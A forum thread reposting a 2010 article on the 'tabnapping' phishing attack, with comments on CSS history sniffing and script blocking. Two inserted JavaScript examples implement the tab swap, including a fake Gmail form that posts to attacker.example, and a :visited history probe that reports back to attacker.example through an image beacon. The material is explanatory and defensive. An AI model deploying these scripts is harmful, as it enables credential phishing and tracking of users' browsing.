Free Republic
Browse · Search
General/Chat
Topics · Post Article


Devious ‘Tabnapping’ Attack Hijacks Browser Tabs
webmonkey

Posted on 05/25/2010 12:19:17 PM PDT by Gomez

Traditional phishing attacks are reasonably easy to avoid: don’t click links in suspicious e-mails (or, if you are really paranoid, in any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to phish, by hijacking browser tabs you have left open but are no longer looking at.

The attack works by first detecting that the tab the page is in no longer has focus, that is, you have switched to another tab or application. The attacking script then changes the tab’s favicon and title and rewrites the page contents to look like another site, say a fake Gmail login screen, all while the tab sits in the background. Nothing navigates anywhere: the page simply redraws itself, so the address bar keeps showing the original URL.

Even scarier, the script can combine this with a CSS-based history check (the :visited link-color trick discussed further down this thread) to find sites you actually visit and impersonate one of those rather than guessing.

For example, using Raskin’s method an attacker can hijack your tab, detect that you frequently log in to Citibank’s website, and impersonate that site, complete with a message that your session has timed out and a request to log in again.

Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As Raskin writes, “as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is mailable and moldable and the user will most likely simply think they left [the] tab open.”

The one reliable clue that you’re being tricked is the address bar: the URL will be wrong. The favicon, the title and a convincing login form are all under the page’s control; the URL is not.

Raskin has set up a demonstration on his blog post. Visit the page, switch to another tab, wait a few seconds and switch back: Raskin’s site will have redrawn itself to look like the Gmail login screen. (Raskin uses a screenshot image for the demo, which is easy to spot up close, but a real attack would present a working login form that looks exactly like Gmail’s and posts whatever you type to the attacker.)

In my testing the attack worked in Firefox 3.6, 3.7a, Opera 10 and Safari 4. It did not work in Google Chrome on OS X when the tab was in the background, though it did work when I switched from Chrome to another application. Also, some browsers don’t change the favicon, though it’s possible that they could with a little tinkering to Raskin’s script.

So how do you stop this attack? Well, Raskin points out that Firefox’s coming Account Manager, which delegates tasks like logging in to the browser itself, is one possible fix, since the browser always checks the URL even when you don’t. Password managers such as 1Password work the same way: they only offer the credentials saved for the site whose URL is actually in the address bar, so they stay silent on an impostor. That protection only holds if you let the tool fill your password every time and treat a missing autofill as a warning rather than typing the password in by hand.

The other fix is on the developer side: don’t load scripts from other sites into your pages unless you have to. Any script you include runs with full control of your page and can do everything described above to your visitors, so even if you trust the site your script is loaded from today, that site could be compromised tomorrow and your page would become the delivery vehicle.

In the meantime, raise your paranoia level and start paying attention to the URL bar, especially before typing a password into a tab you haven’t looked at for a while.


TOPICS: Computers/Internet
KEYWORDS: browsers; chrome; computers; computersecurity; firefox; internet; malware; opera; phishing; safari
The original article has a video demo
1 posted on 05/25/2010 12:19:17 PM PDT by Gomez
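The attack sequence the article describes, written out as plain DOM JavaScript. This is an added example, not Raskin's demo code and not from the article: it wires the blur-then-swap logic onto a tiny in-memory stand-in for window and document so it can be run outside a browser (in a real page you would pass the real `window` and `document`). The five-second delay, the attacker URL, the fake Gmail title, favicon and form, and the `managerWouldFill` check standing in for a password manager's URL matching are all assumptions for the demonstration.

```javascript
'use strict';
// Added example (not the article's or Aza Raskin's code). Tab-napping in
// three steps: notice the tab lost focus, wait, then swap favicon, title and
// body. The URL never changes, which is why the address bar is the only
// honest cue. All names/URLs/delays below are assumptions for the demo.

const UNFOCUSED_MS = 5000;          // assumed: how long the tab must sit unfocused
const DISGUISE = {                  // constructed: what the tab is turned into
  title: 'Gmail: Email from Google',
  favicon: 'https://attacker.example/fake-gmail.ico',
  bodyHtml: '<form action="https://attacker.example/steal">' +
            'Your session has expired. Please sign in again.' +
            '<input name="u"><input name="p" type="password"></form>',
};

function faviconLink(doc) {
  return doc.querySelector('link[rel~="icon"]');
}

function armTabnap(win, doc, disguise) {
  let timer = null;
  let swapped = false;

  function swap() {
    doc.title = disguise.title;
    let link = faviconLink(doc);
    if (!link) {                     // page had no favicon yet: add one
      link = doc.createElement('link');
      link.rel = 'icon';
      doc.head.appendChild(link);
    }
    link.href = disguise.favicon;
    doc.body.innerHTML = disguise.bodyHtml;
    swapped = true;
  }

  // 2010-era browsers exposed tab focus as window blur/focus; today you would
  // also listen for document 'visibilitychange'.
  win.addEventListener('blur', () => {
    if (!swapped && timer === null) timer = win.setTimeout(swap, UNFOCUSED_MS);
  });
  win.addEventListener('focus', () => {   // user came back too soon: stand down
    if (timer !== null) { win.clearTimeout(timer); timer = null; }
  });
  return { swapped: () => swapped };
}

// Defensive counterpart: a password manager fills only when the saved site's
// origin equals the origin of the URL really in the address bar.
function managerWouldFill(savedOrigin, pageHref) {
  return new URL(pageHref).origin === new URL(savedOrigin).origin;
}

// Minimal browser stand-in with a manual clock so the scenario runs offline.
function fakeBrowser() {
  const listeners = {};
  const timers = [];
  let now = 0, nextId = 1;
  const head = { children: [], appendChild(n) { this.children.push(n); } };
  const doc = {
    title: 'Some blog post',
    head,
    body: { innerHTML: '<p>original page</p>' },
    querySelector(sel) {
      return sel === 'link[rel~="icon"]' ? head.children.find((n) => n.rel === 'icon') || null : null;
    },
    createElement(tag) { return { tagName: tag.toUpperCase(), rel: '', href: '' }; },
  };
  const win = {
    location: { href: 'https://attacker.example/blog/tabnapping' },
    addEventListener(type, fn) { (listeners[type] = listeners[type] || []).push(fn); },
    setTimeout(fn, ms) { const id = nextId++; timers.push({ id, at: now + ms, fn }); return id; },
    clearTimeout(id) { const i = timers.findIndex((t) => t.id === id); if (i >= 0) timers.splice(i, 1); },
    fire(type) { (listeners[type] || []).forEach((fn) => fn({ type })); },
    advance(ms) {
      now += ms;
      timers.filter((t) => t.at <= now).forEach((t) => { timers.splice(timers.indexOf(t), 1); t.fn(); });
    },
  };
  return { win, doc };
}

// Walk through it: blur, a brief return (timer cancelled), blur again, timer
// fires, page is redrawn; the URL is untouched, so URL matching refuses to fill.
function runScenario() {
  const { win, doc } = fakeBrowser();
  const tabnap = armTabnap(win, doc, DISGUISE);
  win.fire('blur');
  win.fire('focus'); win.fire('blur');
  win.advance(UNFOCUSED_MS - 1);
  const before = { title: doc.title, swapped: tabnap.swapped() };
  win.advance(1);
  const link = faviconLink(doc);
  return {
    before,
    after: { title: doc.title, favicon: link && link.href, swapped: tabnap.swapped(),
             looksLikeLogin: doc.body.innerHTML.includes('password') },
    href: win.location.href,
    managerFills: managerWouldFill('https://mail.google.com', win.location.href),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runScenario(), null, 2));
}
```

Running it prints the before/after state: the title and favicon now say Gmail and the body carries a password field, yet `href` is still the attacker's URL and `managerFills` is false. The focus handler is the detail worth noticing; without it a user who glances back at the tab before the timer fires would watch the page change under them.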

To: Swordmaker; ShadowAce

ping


2 posted on 05/25/2010 12:19:55 PM PDT by Gomez (killer of threads)

To: Gomez

Yikes. I am very heavy in the security world these days. This is pretty interesting.


3 posted on 05/25/2010 12:25:28 PM PDT by Lazamataz ("We beat the Soviet Union. Then we became them." -- Lazamataz, 2005)

To: Gomez; Lazamataz

This is definitely not cool. I know Firefox for version 4 is slated to have a way to hide the history, but it’s not been said how they will address it.

From what I’ve heard, browsers are designed for allowing access to this history. There’s even a website that can show you a number of places you’ve visited just by displaying their page. It is either through the history or through deciphering the cookies.


4 posted on 05/25/2010 12:32:52 PM PDT by ConservativeMind (Hypocrisy: "Animal rightists" who eat meat & pen up pets while accusing hog farmers of cruelty.)

To: ConservativeMind

As I’ve said many times, “It will be amusing when the hacker scum discover that Firefox and other ‘Not Microsoft’ browsers are as fun to hack, since they are as open as or more open than IE now.” This is a case where, by trying to kill IE, they might be making it into the most secure, as it has to defend the most.


5 posted on 05/25/2010 12:35:53 PM PDT by Ingtar (If Palin were perfect, she could campaign for godhood. Since she is human, Obama's job will do.)

To: Gomez

Seeing more browser hijack threats and more indications that Firefox is just as vulnerable as IE.


6 posted on 05/25/2010 12:36:10 PM PDT by a fool in paradise (Throw the bums out in 2010.)

To: ConservativeMind; John Robinson; Jim Robinson
From what I’ve heard, browsers are designed for allowing access to this history

My understanding is this: a page will display visited links in different colors. The javascript can then query the color of any given text element. Hence, you can create a hidden page (iframe) that can check to see if you've visited specific web addresses.

This is something that should be of great concern to all FReepers - it is very easy for, say, a government website to check if you've been to http://www.freerepublic.com! (If that link is discolored - which it certainly should be for this crew - then javascript can detect you've been visiting it....)

7 posted on 05/25/2010 12:51:20 PM PDT by Yossarian (A pro-life democrat is one who holds out for something in return for his pro-abortion vote.)

To: Yossarian; John Robinson; Jim Robinson

But isn’t it the browser that is the only thing determining the color? In this case, I believe it is only the browser doing it. There’s no reason for a browser to SEND all of our history to others to simply change a color on only our screen.

I think other history-related issues are at play with this thread and not the hyperlink color thing you mention. Sorry.


8 posted on 05/25/2010 12:54:20 PM PDT by ConservativeMind (Hypocrisy: "Animal rightists" who eat meat & pen up pets while accusing hog farmers of cruelty.)

To: rdb3; Calvinist_Dark_Lord; GodGunsandGuts; CyberCowboy777; Salo; Bobsat; JosephW; ...

9 posted on 05/25/2010 12:56:44 PM PDT by ShadowAce (Linux -- The Ultimate Windows Service Pack)

To: ConservativeMind
No, the site can't send your whole history back to the server, but because the site CSS determines the visited link color, then javascript can execute differently if it detects the text element of a particular link (for example, http://www.freerepublic.com) is the "visited" color or not.

That differing javascript code execution is how the data gets sent back to the server - for example, by trying to load a graphic with a coded file name. Apache will both return the graphic image and note that the coded filename was accessed, and by a certain IP address - and, if that spying webpage had a login, by what login account.

10 posted on 05/25/2010 1:02:40 PM PDT by Yossarian (A pro-life democrat is one who holds out for something in return for his pro-abortion vote.)
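The two-part technique Yossarian describes in posts 7 and 10 (probe link colors for :visited, then leak the answer through an image request with a coded file name) as an added example. This is not code from the thread or from any real sniffing page; it runs the probe against a small stand-in for `document` and `getComputedStyle` so it works outside a browser. The candidate URLs, the visited/unvisited colors and the beacon host are constructed for the example.

```javascript
'use strict';
// Added example (not code from this thread): CSS :visited history sniffing
// plus an image-request beacon. URLs, colours and beacon host are made up.

const CANDIDATES = [                        // constructed list of sites to test for
  'http://www.freerepublic.com/',
  'http://www.example-bank.test/login',
  'http://www.example-news.test/',
];
const VISITED_COLOR = 'rgb(85, 26, 139)';   // what the page's own a:visited rule sets
const UNVISITED_COLOR = 'rgb(0, 0, 238)';

// Probe each URL: inject <a href=URL>, read its computed colour back, compare
// with the colour the stylesheet gives visited links. On 2010-era browsers
// getComputedStyle returned the real :visited colour, so this worked.
function sniffHistory(doc, getComputedStyle, urls) {
  const hits = [];
  for (const url of urls) {
    const a = doc.createElement('a');
    a.href = url;
    a.textContent = url;
    doc.body.appendChild(a);
    if (getComputedStyle(a).color === VISITED_COLOR) hits.push(url);
    doc.body.removeChild(a);                // leave no trace in the page
  }
  return hits;
}

// Encode the result into a file name and fetch it as an image. The server
// never sees the history itself, only a request path it can log alongside
// the client IP (and session, if the page had a login).
function beaconUrl(base, urls, hits) {
  let bits = '';
  for (const url of urls) bits += hits.includes(url) ? '1' : '0';
  return `${base}/px-${bits}.gif`;
}

// In a real page this is the exfiltration step; here it just returns the URL.
function sendBeacon(url, ImageCtor) {
  if (ImageCtor) { const img = new ImageCtor(); img.src = url; }
  return url;
}

// Stand-in browser: a hidden history set decides what colour each link gets.
function fakeBrowser(history) {
  const doc = {
    body: {
      nodes: [],
      appendChild(n) { this.nodes.push(n); },
      removeChild(n) { this.nodes.splice(this.nodes.indexOf(n), 1); },
    },
    createElement(tag) { return { tagName: tag.toUpperCase(), href: '', textContent: '' }; },
  };
  const getComputedStyle = (el) => ({ color: history.has(el.href) ? VISITED_COLOR : UNVISITED_COLOR });
  return { doc, getComputedStyle };
}

function runScenario() {
  const visited = new Set(['http://www.freerepublic.com/', 'http://www.example-news.test/']);
  const { doc, getComputedStyle } = fakeBrowser(visited);
  const hits = sniffHistory(doc, getComputedStyle, CANDIDATES);
  const beacon = sendBeacon(beaconUrl('https://attacker.example', CANDIDATES, hits), null);
  return { hits, beacon, leftoverNodes: doc.body.nodes.length };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runScenario(), null, 2));
}
```

The beacon path `px-101.gif` tells the server that the first and third candidates were visited, exactly the "coded file name" in the post above. Two caveats for anyone trying this today: current browsers deliberately report the unvisited colour from `getComputedStyle` for links regardless of history, so the probe returns nothing, and a script blocker such as the NoScript setup mentioned later in this thread stops the probe before it starts.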

To: ShadowAce

Wow! That’s pretty wicked!

Thanks for the heads up!


11 posted on 05/25/2010 1:06:07 PM PDT by KoRn (Department of Homeland Security, Certified - "Right Wing Extremist" - I Hate Mexico)

To: Gomez

Frack! I’m about ready to go back to Netscape 1.0, text-only ;-)


12 posted on 05/25/2010 1:12:11 PM PDT by bigbob

To: ConservativeMind

Can you post the name of that site?


13 posted on 05/25/2010 1:17:35 PM PDT by dangerdoc

To: Gomez

Odd error found; “ memory is mailable and moldable “; probably should be ‘malleable,’ but since this doesn’t affect the story and outcome, who cares.


14 posted on 05/25/2010 1:22:10 PM PDT by Old Professer (The critic writes with rapier pen, dips it twice, then writes again.)

To: Gomez
I use FF with NoScript, and allow scripts only when I want them, on a per-site basis. Blocking Javascript also breaks most ads, and Ghostery cleans up the web bugs.

All in all, Firefox today, with a good set of extensions, is the most privacy-protecting browser on the market. Extensions that you must have are: NoScript, Adblock Plus, Ghostery, OptimizeGoogle. Keep your IE or Chrome for script-heavy trusted sites, but do most of your casual browsing in FF. You'd be amazed to see how many spy and ad sites it blocks.

15 posted on 05/25/2010 1:25:54 PM PDT by Greysard

To: Greysard

I keep history for one day and keep cookies turned off with a few exceptions. See any problem with that?


16 posted on 05/25/2010 1:43:23 PM PDT by 2aberro

To: dangerdoc

This article references that and other sites:

http://www.theregister.co.uk/2010/05/20/browser_history_attack/


17 posted on 05/25/2010 1:47:11 PM PDT by ConservativeMind (Hypocrisy: "Animal rightists" who eat meat & pen up pets while accusing hog farmers of cruelty.)

To: 2aberro
I keep history for one day and keep cookies turned off with a few exceptions. See any problem with that?

Your solutions don't block scripts, and those scripts can do whatever they want to in your browser (such as execute the attack that the article describes.) Web bugs are also not affected, and they report your page visit to whoever planted the bug.

I tested the exploit in my FF, and the exploit doesn't work at all. This is because NoScript blocked the Javascript on his site by default, and that's how it should be. Most sites don't need Javascript, and if it's there it's only to spy on you and to show you the ads. Some sites use Javascript for menus, and most shopping carts use Javascript to validate your input. Those should be allowed. Or I use IE for purchases.

18 posted on 05/25/2010 2:02:08 PM PDT by Greysard

To: Greysard

Thanks... JavaScript is now off... let’s see if it adversely affects my surfing.


19 posted on 05/25/2010 2:11:39 PM PDT by 2aberro

To: Greysard

A lot easier to just use konqueror.


20 posted on 05/25/2010 2:15:20 PM PDT by Darth Reardon (Im running for the US Senate for a simple reason, I want to win a Nobel Peace Prize - Rubio)

To: ConservativeMind

I just get a network error when I try to hit that site.


21 posted on 05/25/2010 2:19:19 PM PDT by dangerdoc

To: Gomez
In my testing the attack worked in Firefox 3.6, 3.7a, Opera 10 and Safari 4.

What about IE8? Surely that was able to fall to this attack.

22 posted on 05/25/2010 2:24:49 PM PDT by for-q-clinton (If at first you don't succeed keep on sucking until you do succeed)

To: for-q-clinton

Ok, I just tested on IE8. It only 1/2 worked. The IE logo was still showing on the page—it wasn’t replaced with the Gmail logo.

Oh and I had to run it in compatibility mode. If I didn’t run it in compatibility mode the video player would still be on the page overtop of the gmail prop.


23 posted on 05/25/2010 2:31:38 PM PDT by for-q-clinton (If at first you don't succeed keep on sucking until you do succeed)

To: Greysard

self ping


24 posted on 05/25/2010 3:38:47 PM PDT by killermosquito (Buffalo (and eventually France) is what you get when liberalism runs its course.)

To: Gomez

I’ve never run with tabs; for some reason they annoy me greatly.


25 posted on 05/25/2010 4:09:54 PM PDT by chris_bdba

To: Ingtar

The difference between MSIE and Firefox, however, is that there are extensive open source communities writing for Firefox whereas MSIE is closed and relegated to the hallowed halls of MS programming. Open source communities generally perform much more extensive exploit testing and plug their holes quicker. They may be fun to hack, but oftentimes the hackers are the same people who are patching the holes.

Think of it like the stories of corporations or the FBI/CIA hiring hackers who breached their networks in order to harden them to future attacks.


26 posted on 05/26/2010 5:10:51 AM PDT by rarestia (It's time to water the Tree of Liberty.)

Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.


FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson